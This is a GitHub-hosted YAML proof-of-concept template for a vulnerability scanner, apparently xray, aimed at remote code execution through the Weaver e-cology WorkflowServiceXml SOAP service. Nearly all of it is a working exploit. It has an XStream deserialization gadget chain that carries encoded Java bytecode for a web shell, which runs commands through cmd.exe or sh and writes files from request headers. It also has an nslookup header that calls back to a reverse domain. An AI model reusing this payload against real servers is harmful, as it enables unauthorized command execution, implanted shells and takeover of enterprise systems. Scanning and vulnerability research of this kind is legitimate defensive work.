-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathecology-workflowservicexml-rce.yml
35 lines (35 loc) · 45 KB
/
ecology-workflowservicexml-rce.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
name: poc-yaml-ecology-workflowservicexml-rce
transport: http
set:
reverse: newReverse()
reverseDomain: reverse.domain
reverseIP: reverse.ip
rules:
r0:
request:
method: POST
path: /services%20/WorkflowServiceXml
follow_redirects: false
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0)
Content-Type: text/xml
Xxx: nslookup {{reverseDomain}} {{reverseIP}}
body: >-
<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:web="webservices.services.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:doCreateWorkflowRequest>
<web:string>
<java.util.PriorityQueue serialization="custom">   <unserializable-parents/>   <java.util.PriorityQueue>     <default>       <size>2</size>       <comparator class="org.apache.commons.beanutils.BeanComparator">         <property>outputProperties</property>         <comparator class="org.apache.commons.collections.comparators.ComparableComparator"/>       </comparator>     </default>     <int>3</int>     <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom">       <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>         <default>           <__name>a</__name>           <__bytecodes>             <byte-array>yv66vgAAADQBJgoARwCRCgCSAJMKAJQAlQoAlgCXCACYCgCWAJkKAJoAmwoAmgCcCACdBwB1CACeCgCWAJ8IAKAKABgAoQcAoggAowoADwCkCgAYAKUIAKYKAKcAqAoAGACpCACqCgAYAKsHAKwIAK0IAK4IAK8IALAHALEHALIKAB4AswoAHgC0CgC1ALYKAB0AtwgAuAoAHQC5CgAdALoKABgAuwoARgC8CAC9CgCSAL4IAL8KAMAAwQoAwgDDCADECADFBwDGCgAvAJEKAC8AxwcAyAoAMgDJCgAyAMoKADIAywgAzAoADwDNCADOBwDPCgA5AJEKADkA0AoAOQDRCgA5ANIKANMA1AgA1QoAlgDWCgDXAJsKANcA2AcA2QoAQwDaCgBDAMsHANsHANwBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEACkxUZW1wbGF0ZTsBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcA3QEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAGPGluaXQ+AQADKClWAQAEY21kcwEAE1tMamF2YS9sYW5nL1N0cmluZzsBAAZyZXN1bHQBAAJbQgEAC2NvbnRleHRQYXRoAQAHY29udGVudAEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABWJ5dGVzAQAEZm91cwEAGkxqYXZhL2lvL0ZpbGVPdXRwdXRTdHJlYW07AQALaHR0cFJlcXVlc3QBACRMY29tL2NhdWNoby9zZXJ2ZXIvaHR0cC9IdHRwUmVxdWVzdDsBAANjbWQBAAhzaG93UGF0aAEABHBhdGgBAAFvAQASTGphdmEvbGFuZy9PYmplY3Q7AQABaQEAAUkBAAVjbGF6egEAEUxqYXZhL2xhbmcvQ2xhc3M7AQAFZmllbGQBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQADb2JqAQAHb2JqX2FycgEAE1tMamF2YS9sYW5nL09iamVjdDsBAA1TdGFja01hcFRhYmxlBwDbBwDeBwDfBwDgBwCiBwCsBwBdBwDhAQALc2hvd1Jlc3Bvc2UBACkoTGNvbS9jYXVjaG8vc2VydmVyL2h0dHAvSHR0cFJlcXVlc3Q7W0IpVgEAB3JlcXVlc3QBAAxodHRwUmVzcG9uc2UBACVMY29tL2NhdWNoby9zZXJ2ZXIvaHR0cC9IdHRwUmVzcG9uc2U7AQAGbWV0aG9kAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABJodHRwUmVzcG9uc2VTdHJlYW0BACtMY29tL2NhdWNoby9zZXJ2ZXIvaHR0cC9IdHRwUmVzcG9uc2VTdHJlYW07BwDiBwDjBwDkBwDlAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQAKU291cmNlRmlsZQEADVRlbXBsYXRlLmphdmEMAFoAWwcA5gwA5wDoBwDgDADpAOoHAN4MAOsA6gEADHRocmVhZExvY2FscwwA7ADtBwDfDADuAO8MAPAA8QEABXRhYmxlAQAFdmFsdWUMAPIA8wEAImNvbS5jYXVjaG8uc2VydmVyLmh0dHAuSHR0cFJlcXVlc3QMAPQA9QEAImNvbS9jYXVjaG8vc2VydmVyL2h0dHAvSHR0cFJlcXVlc3QBAAN4eHgMAPYA9wwA+AD5AQAHb3MubmFtZQcA+gwA+wD3DAD8APMBAAZ3aW5kb3cMAP0A/gEAEGphdmEvbGFuZy9TdHJpbmcBAAdjbWQuZXhlAQACL2MBAAJzaAEAAi1jAQARamF2YS91dGlsL1NjYW5uZXIBABhqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXIMAFoAjQwA/wEABwEBDAECAQMMAFoBBAEAAlxBDAEFAQYMAQcA8wwBCAEJDAB/AIABAApYLVNob3dQYXRoDAEKAQsBAAAHAQwMAQ0BDgcBDwwBEADzAQAGWC1QYXRoAQAJWC1Db250ZW50AQAWc3VuL21pc2MvQkFTRTY0RGVjb2RlcgwBEQESAQAYamF2YS9pby9GaWxlT3V0cHV0U3RyZWFtDABaARMMARQBFQwBFgBbAQARWytdIFdyaXRlIFN1Y2Nlc3MMARcBGAEADkNvbnRlbnQtTGVuZ3RoAQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIMARkBGgwBGQEbDAEcAPMHAR0MAR4BHwEAFGNyZWF0ZVJlc3BvbnNlU3RyZWFtDAEgASEHASIMASMBJAEAKWNvbS9jYXVjaG8vc2VydmVyL2h0dHAvSHR0cFJlc3BvbnNlU3RyZWFtDAEUASUBAAhUZW1wbGF0ZQEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BAA9qYXZhL2xhbmcvQ2xhc3MBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAEAEGphdmEvbGFuZy9PYmplY3QBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQATamF2YS9pby9JT0V4Y2VwdGlvbgEAH2phdmEvbGFuZy9Ob1N1Y2hNZXRob2RFeGNlcHRpb24BACtqYXZhL2xhbmcvcmVmbGVjdC9JbnZvY2F0aW9uVGFyZ2V0RXhjZXB0aW9uAQAgamF2YS9sYW5nL0lsbGVnYWxBY2Nlc3NFeGNlcHRpb24BABBqYXZhL2xhbmcvVGhyZWFkAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7AQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7AQANZ2V0U3VwZXJjbGFzcwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQAHZ2V0TmFtZQEAFCgpTGphdmEvbGFuZy9TdHJpbmc7AQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAJZ2V0SGVhZGVyAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZzsBAAdpc0VtcHR5AQADKClaAQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQALdG9Mb3dlckNhc2UBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAEbmV4dAEACGdldEJ5dGVzAQAEKClbQgEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBABVqYXZhL2xhbmcvQ2xhc3NMb2FkZXIBAAtnZXRSZXNvdXJjZQEAIihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbmV0L1VSTDsBAAxqYXZhL25ldC9VUkwBAAdnZXRQYXRoAQAMZGVjb2RlQnVmZmVyAQAWKExqYXZhL2xhbmcvU3RyaW5nOylbQgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEABXdyaXRlAQAFKFtCKVYB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</byte-array>           </__bytecodes>           <__transletIndex>-1</__transletIndex>           <__indentNumber>0</__indentNumber>         </default>         <boolean>false</boolean>       </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>     </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>     <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/>   </java.util.PriorityQueue> </java.util.PriorityQueue></web:string>
<web:string>2</web:string>
</web:doCreateWorkflowRequest>
</soapenv:Body>
</soapenv:Envelope>
expression: response.status == 200 && reverse.wait(5)
expression: r0()
detail:
author: Hasaki
links:
- https://www.baidu.com